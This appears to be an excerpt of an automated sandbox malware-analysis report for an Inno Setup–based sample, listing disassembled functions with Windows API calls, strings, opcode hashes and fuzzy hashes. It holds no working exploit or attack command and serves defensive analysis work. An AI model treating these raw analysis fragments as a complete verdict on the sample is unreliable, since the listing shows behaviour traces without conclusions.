                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PI$%s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                      • API String ID: 47109696-2023862778
                                                                                      • Opcode ID: 631d1d32ed976d7a2296184d5c0d2f3cf8c369661ad41bfb37e5f76fcf4f9ba7
                                                                                      • Instruction ID: 2fcff84c3ae67162e3ffacf77063da78f15bdb16a6a8b48b49f63a94f6242022
                                                                                      • Opcode Fuzzy Hash: 631d1d32ed976d7a2296184d5c0d2f3cf8c369661ad41bfb37e5f76fcf4f9ba7
                                                                                      • Instruction Fuzzy Hash: 96314174E042089FDB11EFAADC51A9EBBF8EB48704F90487BE414E7391D7789A058B58
                                                                                      Function 0042E7D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E802
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E808
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E831
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                      • API String ID: 828529508-2866557904
                                                                                      • Opcode ID: a8508c04b9d2f5bfbb96bb821981feec28a03bb8c83af4d38bd3e4f3c08e389f
                                                                                      • Instruction ID: ad48e71c188330483611c0ccbf5126987ea3f08380f38d7ba2466a98a55f956a
                                                                                      • Opcode Fuzzy Hash: a8508c04b9d2f5bfbb96bb821981feec28a03bb8c83af4d38bd3e4f3c08e389f
                                                                                      • Instruction Fuzzy Hash: 35F0C2D138066176E620B2BBAC82F6B158C8F94765F540036F148EB2C2EA6CC905426E
                                                                                      Function 00456268 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00456298
                                                                                      • GetExitCodeProcess.KERNEL32(?,00492E02), ref: 004562B9
                                                                                      • CloseHandle.KERNEL32(?,004562EC,?,?,00456B07,00000000,00000000), ref: 004562DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                      • API String ID: 2573145106-3235461205
                                                                                      • Opcode ID: b905d95b21eb16817882d878bed5eaf33046abd5eff07b3401a45a878f64f984
                                                                                      • Instruction ID: 30010b37e156efe240ce284c3751ee9f3f87d85e2b6a261707359958cd490efa
                                                                                      • Opcode Fuzzy Hash: b905d95b21eb16817882d878bed5eaf33046abd5eff07b3401a45a878f64f984
                                                                                      • Instruction Fuzzy Hash: 9801A234604204AFDB10FBA98D12A2A77E8EB49710F9104B7F910E73D3DA7D9D08861C
                                                                                      Function 004732C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004732D0
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004733C7,0pI,00000000), ref: 004732E3
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004732E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                      • API String ID: 1782028327-3855017861
                                                                                      • Opcode ID: d3186cc3dc794e7465d39709d056f6715875b1f20938bb44e2ef386321cd694c
                                                                                      • Instruction ID: 249699eff17dbda02fe1af5a7c4854b1352fabbd495b9b7335dc6b3b1f0a0c65
                                                                                      • Opcode Fuzzy Hash: d3186cc3dc794e7465d39709d056f6715875b1f20938bb44e2ef386321cd694c
                                                                                      • Instruction Fuzzy Hash: DBD05E9020070275D9107AF54D47D5B224C8984712710857B3414F6183CD3CDA006A6D
                                                                                      Function 00416B9C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                                      • SaveDC.GDI32(?), ref: 00416BF3
                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                                      • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                                      • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                      • String ID:
                                                                                      • API String ID: 3808407030-0
                                                                                      • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                                      • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                                      • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                                      • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                                      Function 00414770 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                                      • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                                      • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                                      • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                                      Function 0042973C Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                                      • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                                      • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                                      • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                                      Function 0041BB28 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                                      • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                      • String ID:
                                                                                      • API String ID: 2246927583-0
                                                                                      • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                                      • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                                      • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                                      • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                                      Function 0046F304 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0045B728: SetLastError.KERNEL32(00000057,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B793
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0046F3D8,?,?,00000001,00497154), ref: 0046F391
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0046F3D8,?,?,00000001,00497154), ref: 0046F3A7
                                                                                      Strings
                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0046F356
                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 0046F3B8
                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046F39B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                      • API String ID: 1452528299-4018462623
                                                                                      • Opcode ID: 788c315b7af78b705df02674c92daeb7f44be0388b74eefc3bf89a14f2c9356d
                                                                                      • Instruction ID: ef7c6c74ecef8c5dcb146dfdc27ea61306564732d519a6a89d10c305d013d1cf
                                                                                      • Opcode Fuzzy Hash: 788c315b7af78b705df02674c92daeb7f44be0388b74eefc3bf89a14f2c9356d
                                                                                      • Instruction Fuzzy Hash: B421AA70A046445FCB00DBA9D8816AEBBE8EF49314F50417FE844E7392E7785D49876A
                                                                                      Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                      • String ID:
                                                                                      • API String ID: 262959230-0
                                                                                      • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                      • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                      Function 00414350 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414389
                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A022A08830$A480
                                                                                      • String ID:
                                                                                      • API String ID: 3036329673-0
                                                                                      • Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                                      • Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
                                                                                      • Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                                      • Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
                                                                                      Function 00401548 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 00401566
                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 0040158B
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,T=d,?,?,?,004018B4), ref: 004015B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Alloc$Free
                                                                                      • String ID: T=d$d=d
                                                                                      • API String ID: 3668210933-3726205262
                                                                                      • Opcode ID: d2517b2848a3e48debd733cbcc194f1d7450fe1c69e1d9f9fa61647bd21528fe
                                                                                      • Instruction ID: 5797ca947971a1fa5f0c07c4efe461a423a426aef50e25704ee96cdc5a06cd6d
                                                                                      • Opcode Fuzzy Hash: d2517b2848a3e48debd733cbcc194f1d7450fe1c69e1d9f9fa61647bd21528fe
                                                                                      • Instruction Fuzzy Hash: C5F0C8716403206AEB315A694C85F133AD4DBC5794F104075BE09FF3D9D6B8980082AC
                                                                                      Function 004755B4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476DAD,?,00000000,00000000,00000001,00000000,00475851,?,00000000), ref: 00475815
                                                                                      Strings
                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475689
                                                                                      • pUG, xrefs: 004756AE
                                                                                      • Failed to parse "reg" constant, xrefs: 0047581C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$pUG
                                                                                      • API String ID: 3535843008-1176165611
                                                                                      • Opcode ID: 3642018d57e9592f06bab58574b61b62b6ca112a26629dc16a5ab29dcfff1776
                                                                                      • Instruction ID: a53c2b258f7a770121dbc7a1e713ee2373e0806090ae57177e88baa161e34d04
                                                                                      • Opcode Fuzzy Hash: 3642018d57e9592f06bab58574b61b62b6ca112a26629dc16a5ab29dcfff1776
                                                                                      • Instruction Fuzzy Hash: 93816274E00548AFCB10EF95D481ADEBBF9AF48314F50C16AE418BB391D778AE05CB99
                                                                                      Function 00424C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
                                                                                        • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
                                                                                        • Part of subcall function 0041EFE4: 73A15940.USER32(00000000,Function_0001EFC0), ref: 0041F002
                                                                                        • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424D39
                                                                                      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424E0D
                                                                                        • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
                                                                                        • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
                                                                                        • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
                                                                                        • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CurrentOffsetRect$A15940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                                      • String ID: KB
                                                                                      • API String ID: 4121718042-1869488878
                                                                                      • Opcode ID: fd017592340e6a7deae3be5c789b7c506f4553282bb9063ebaa9b04636988139
                                                                                      • Instruction ID: 8a1ca8d85bab54549b4d9d093631307a73357c8a1ef7de59c5480922928757da
                                                                                      • Opcode Fuzzy Hash: fd017592340e6a7deae3be5c789b7c506f4553282bb9063ebaa9b04636988139
                                                                                      • Instruction Fuzzy Hash: D6811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
                                                                                      Function 00406F0C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                      • String ID: Z
                                                                                      • API String ID: 3604996873-1505515367
                                                                                      • Opcode ID: 92ba5960390d49c3d5abeb35786e3f2b2430fe15f73cbae2fbe59e8f9896e220
                                                                                      • Instruction ID: f15ffb13b1197877662b480f320dceb00dd84bb003a9336f5ebe52512d9587e7
                                                                                      • Opcode Fuzzy Hash: 92ba5960390d49c3d5abeb35786e3f2b2430fe15f73cbae2fbe59e8f9896e220
                                                                                      • Instruction Fuzzy Hash: B2515170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
                                                                                      Function 0044C9F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetRectEmpty.USER32(?), ref: 0044CA82
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044CAAD
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044CB35
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
